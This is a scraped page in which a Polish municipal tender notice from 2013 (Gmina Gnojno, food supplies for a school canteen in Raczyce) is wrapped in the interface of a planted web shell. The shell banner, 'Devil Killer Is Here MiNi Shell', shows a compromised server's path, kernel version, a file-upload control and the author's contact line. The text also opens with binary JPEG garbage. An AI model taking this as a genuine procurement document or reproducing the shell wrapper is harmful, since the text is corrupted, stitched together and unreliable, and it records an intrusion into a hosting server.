JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/496936-N-2013.html

<p class="kh_header"><b>Gnojno: Dostawa pieczywa na potrzeby stołówki szkolnej w Szkole Podstawowej           w Raczycach</b><br>
<b>Numer ogłoszenia: 496936 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gnojno , Gnojno 145, 28-114 Gnojno, woj. świętokrzyskie, tel. 0413532038, faks 0413532038.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminy.com.pl/gnojno/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pieczywa na potrzeby stołówki szkolnej w Szkole Podstawowej           w Raczycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa żywności do Szkoły Podstawowej            w Raczycach z podziałem na 5 części:   
Część I  zamówienia obejmuje - mięso i produkty mięsne
Część II  zamówienia obejmuje - pieczywo, wyroby piekarskie i ciastkarskie
Część III  zamówienia obejmuje - artykuły mleczarskie
Część IV  zamówienia obejmuje - artykuły spożywcze suche i inne
Część V  zamówienia obejmuje - warzywa i owoce
I. Szczegółowy opis przedmiotu zamówienia:
Część  I - Mięso i produkty mięsne
1.	Boczek wędzony parzony  - 20 kg
2.	Kiełbasa cienka I klasa (80% mięsa wieprzowego na 100g)- produkt polski - 1200 kg
3.	Łopatka bez kości I klasa- produkt polski - 600 kg
4.	Filet (piersi) z kurczaka I klasa- produkt polski - 600 kg
5.	Korpusy drobiowe I klasa produkt polski - 250 kg
6.	Schab wieprzowy bez kości I klasa- produkt polski - 100 kg
7.	Słonina - 20 kg
8.	Parówki śniadaniowe (83 % mięsa wieprzowego)- I klasa - 300 kg
9.	Smalec - 60 kg
10.	Karczek bez kości- 800 kg
11.	Udka z kurczaka, ćwiartka tylna  bez grzbietu - 1000kg
12.	Szynka mięso - 700 kg
13.	Podudzia drobiowe (dramstik  z kurczaka )- 150 kg
14.	Udziec z indyka świeży - 140 kg

Część II - Pieczywo, wyroby piekarskie i ciastkarskie 
1.	Chleb wiejski 0,6kg - 3500 szt.
2.	Bułka zwykła (pszenna)- 300 szt.
3.	Bułka słodka (ser, dżem, czekolada) - 1100 szt.
4.	Pączki (dżem, czekolada) - 1100 szt.

Cześć III - Artykuły mleczarskie
1.	Śmietana kremówka 30% tłuszczu 0,5 l - 350 szt.
2.	Ser biały (półtłusty) - 300 kg
3.	Masło 200g  zawartość tłuszczu 82% - 300 szt.
4.	Mleko 3,2% 1l - 50L
5.	Serki homogenizowane 150g - 370 szt.
6.	Śmietana w kubku 400 ml 18% - 200 szt.
Część IV - Artykuły spożywcze suche i inne 
1.	Barszcz biały w butelkach 0,5l - 300 szt.
2.	Bazylia 10g - 100 szt.
3.	Buraczki słoik 340g - 1200 szt.
4.	Cukier 1kg - 210 szt.
5.	Czosnek granulowany 20g  - 500 szt.
6.	Jajka kl. L - 7000 szt.
7.	Kwasek cytrynowy 20g - 60 szt.
8.	Przyprawa warzywna sypka 1 kg - 150 kg
9.	Kalafior 400g - 200 szt.
10.	Kostka mięsna 80g - 150 szt.
11.	Koncentrat pomidorowy 200g słoik 30% - 400 szt.
12.	Ketchup łagodny 500g- 60 szt.
13.	Koper suszony 6g - 200 szt.
14.	Kasza jęczmienna saszetki 4x100g - opakowanie 400g  - 1300 opak.
15.	Liść laurowy 6g - 40 szt.
16.	Magii 1l- 25 L
17.	Majeranek 10g - 120 szt.
18.	Makaron różny 0,5kg - 3000 kg
19.	Mąka typ 550 1kg - 250 kg
20.	Musztarda słoik 190 g - 30 szt.
21.	Ogórki konserwowe słoik 870g z zalewą - 350 szt.
22.	Olej (butelka  3l) - 80 szt.
23.	Pieprz mielony prawdziwy 15g - 100 szt.
24.	Pieprz mielony ziołowy 30g - 400 szt.
25.	Pierogi różne (paczka 1 kg) - 1000 kg
26.	Przyprawa do kurczaka 30g - 100 szt.
27.	Przyprawa do karkówki 20g - 50 szt.
28.	Pietruszka suszona 6g - 150 szt.
29.	Papryka słodka 20g - 40 szt.
30.	Papryka ostra 20g - 40 szt.
31.	Przecier ogórkowy w słoiku 340g -  350 szt.
32.	Ryż saszetki 4x100g opakowanie 400g - 300 opak.
33.	Rosołki wołowe 80g - 150 szt.
34.	Rosołki drobiowe 80g - 150 szt.
35.	Sól 1kg - 100 kg
36.	Sos myśliwski w torebkach - 400 szt.
37.	Susz warzywny w torebkach 100g - 250 szt.
38.	Sałatka szwedzka słoik - 450 szt.
39.	Sos spaghetti w słoikach 520g - 400 szt.
40.	Warzywa mrożone 7- składnikowe 450g - 250 szt.
41.	Ziele angielskie 12g - 60 szt.
42.	Czekolada twarda mleczna 100g - 740 szt.
43.	Soki owocowe w kartoniku 200ml - 1100 szt.
44.	Bułka tarta 0,5kg - 200 szt.
45.	Ryby mrożone - 300 kg

Część V - Warzywa i owoce
1.	Buraki czerwone - 20 kg
2.	Cebula biała - 30kg
3.	Cytryny- 10 kg
4.	Kapusta włoska- 10 szt.
5.	Kapusta kiszona 1kg - 200 kg
6.	Marchew - 300 kg
7.	Kapusta pekińska - 200 kg
8.	Pieczarki - 50 kg
9.	Por - 15 kg
10.	Seler korzeń - 20 kg
11.	Groch łuskany połówki 0,5kg -75kg
12.	Kapusta biała- 100 kg
13.	Jabłka -100 kg
14.	Ziemniaki- 6000 kg
15.	Kapusta czerwona -50 kg
16.	Banany - 100 kg
17.	Sałata masłowa świeża (główka) -100 szt.
18.	Pietruszka korzeń- 10 kg
19.	Pietruszka nać (pęczek) - 30 szt.
20.	Pomidory świeże - 50 kg
21.	Ogórki świeże-  50 kg
22.	Koperek świeży (pęczek) - 30 szt.
23.	Szczypiorek zielony (pęczek )- 30 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.80.00.00-6, 15.30.00.00-1, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, formularz asortymentowo - cenowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Za zgodą Zamawiającego dopuszcza się możliwość wprowadzenia pisemnych zmian
postanowień zawartej umowy w stosunku do treści oferty na podstawie które dokonano wyboru Wykonawcy na podst. art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności:
a)zmiana obowiązującej stawki podatku VAT, spowodowana zmianą przepisów,
- Zmiana umowy w tym zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy prawnej do podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, ustawa lub innej podstawy do zmiany cen - zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminy.com.pl/gnojno/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2013 godzina 10:00, miejsce: Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno - pokój nr 11 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część I - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  I - Mięso i produkty mięsne obejmuje sukcesywną  dostawę:
1.	Boczek wędzony parzony  - 20 kg
2.	Kiełbasa cienka I klasa (80% mięsa wieprzowego na 100g)- produkt polski - 1200 kg
3.	Łopatka bez kości I klasa- produkt polski - 600 kg
4.	Filet (piersi) z kurczaka I klasa- produkt polski - 600 kg
5.	Korpusy drobiowe I klasa produkt polski - 250 kg
6.	Schab wieprzowy bez kości I klasa- produkt polski - 100 kg
7.	Słonina - 20 kg
8.	Parówki śniadaniowe (83 % mięsa wieprzowego)- I klasa - 300 kg
9.	Smalec - 60 kg
10.	Karczek bez kości- 800 kg
11.	Udka z kurczaka, ćwiartka tylna  bez grzbietu - 1000kg
12.	Szynka mięso - 700 kg
13.	Podudzia drobiowe (dramstik  z kurczaka )- 150 kg
14.	Udziec z indyka świeży - 140 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II -pieczywo, wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - obejmuje sukcesywną dostawę Pieczywo, wyroby piekarskie i ciastkarskie: 
1.	Chleb wiejski 0,6kg - 3500 szt.
2.	Bułka zwykła (pszenna)- 300 szt.
3.	Bułka słodka (ser, dżem, czekolada) - 1100 szt.
4.	Pączki (dżem, czekolada) - 1100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III Artykuły mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć III - obejmuje sukcesywną dostawę artykułów mleczarskich:
1.	Śmietana kremówka 30% tłuszczu 0,5 l - 350 szt.
2.	Ser biały (półtłusty) - 300 kg
3.	Masło 200g  zawartość tłuszczu 82% - 300 szt.
4.	Mleko 3,2% 1l - 50L
5.	Serki homogenizowane 150g - 370 szt.
6.	Śmietana w kubku 400 ml 18% - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV Artykuły spożywcze suche i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - obejmuje sukcesywną dostawę artykułów  spożywczych suchych i inne: 
1.	Barszcz biały w butelkach 0,5l - 300 szt.
2.	Bazylia 10g - 100 szt.
3.	Buraczki słoik 340g - 1200 szt.
4.	Cukier 1kg - 210 szt.
5.	Czosnek granulowany 20g  - 500 szt.
6.	Jajka kl. L - 7000 szt.
7.	Kwasek cytrynowy 20g - 60 szt.
8.	Przyprawa warzywna sypka 1 kg - 150 kg
9.	Kalafior 400g - 200 szt.
10.	Kostka mięsna 80g - 150 szt.
11.	Koncentrat pomidorowy 200g słoik 30% - 400 szt.
12.	Ketchup łagodny 500g- 60 szt.
13.	Koper suszony 6g - 200 szt.
14.	Kasza jęczmienna saszetki 4x100g - opakowanie 400g  - 1300 opak.
15.	Liść laurowy 6g - 40 szt.
16.	Magii 1l- 25 L
17.	Majeranek 10g - 120 szt.
18.	Makaron różny 0,5kg - 3000 kg
19.	Mąka typ 550 1kg - 250 kg
20.	Musztarda słoik 190 g - 30 szt.
21.	Ogórki konserwowe słoik 870g z zalewą - 350 szt.
22.	Olej (butelka  3l) - 80 szt.
23.	Pieprz mielony prawdziwy 15g - 100 szt.
24.	Pieprz mielony ziołowy 30g - 400 szt.
25.	Pierogi różne (paczka 1 kg) - 1000 kg
26.	Przyprawa do kurczaka 30g - 100 szt.
27.	Przyprawa do karkówki 20g - 50 szt.
28.	Pietruszka suszona 6g - 150 szt.
29.	Papryka słodka 20g - 40 szt.
30.	Papryka ostra 20g - 40 szt.
31.	Przecier ogórkowy w słoiku 340g -  350 szt.
32.	Ryż saszetki 4x100g opakowanie 400g - 300 opak.
33.	Rosołki wołowe 80g - 150 szt.
34.	Rosołki drobiowe 80g - 150 szt.
35.	Sól 1kg - 100 kg
36.	Sos myśliwski w torebkach - 400 szt.
37.	Susz warzywny w torebkach 100g - 250 szt.
38.	Sałatka szwedzka słoik - 450 szt.
39.	Sos spaghetti w słoikach 520g - 400 szt.
40.	Warzywa mrożone 7- składnikowe 450g - 250 szt.
41.	Ziele angielskie 12g - 60 szt.
42.	Czekolada twarda mleczna 100g - 740 szt.
43.	Soki owocowe w kartoniku 200ml - 1100 szt.
44.	Bułka tarta 0,5kg - 200 szt.
45.	Ryby mrożone - 300 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - obejmuje sukcesywną dostawę warzyw i owoców:
1.	Buraki czerwone - 20 kg
2.	Cebula biała - 30kg
3.	Cytryny- 10 kg
4.	Kapusta włoska- 10 szt.
5.	Kapusta kiszona 1kg - 200 kg
6.	Marchew - 300 kg
7.	Kapusta pekińska - 200 kg
8.	Pieczarki - 50 kg
9.	Por - 15 kg
10.	Seler korzeń - 20 kg
11.	Groch łuskany połówki 0,5kg -75kg
12.	Kapusta biała- 100 kg
13.	Jabłka -100 kg
14.	Ziemniaki- 6000 kg
15.	Kapusta czerwona -50 kg
16.	Banany - 100 kg
17.	Sałata masłowa świeża (główka) -100 szt.
18.	Pietruszka korzeń- 10 kg
19.	Pietruszka nać (pęczek) - 30 szt.
20.	Pomidory świeże - 50 kg
21.	Ogórki świeże-  50 kg
22.	Koperek świeży (pęczek) - 30 szt.
23.	Szczypiorek zielony (pęczek )- 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com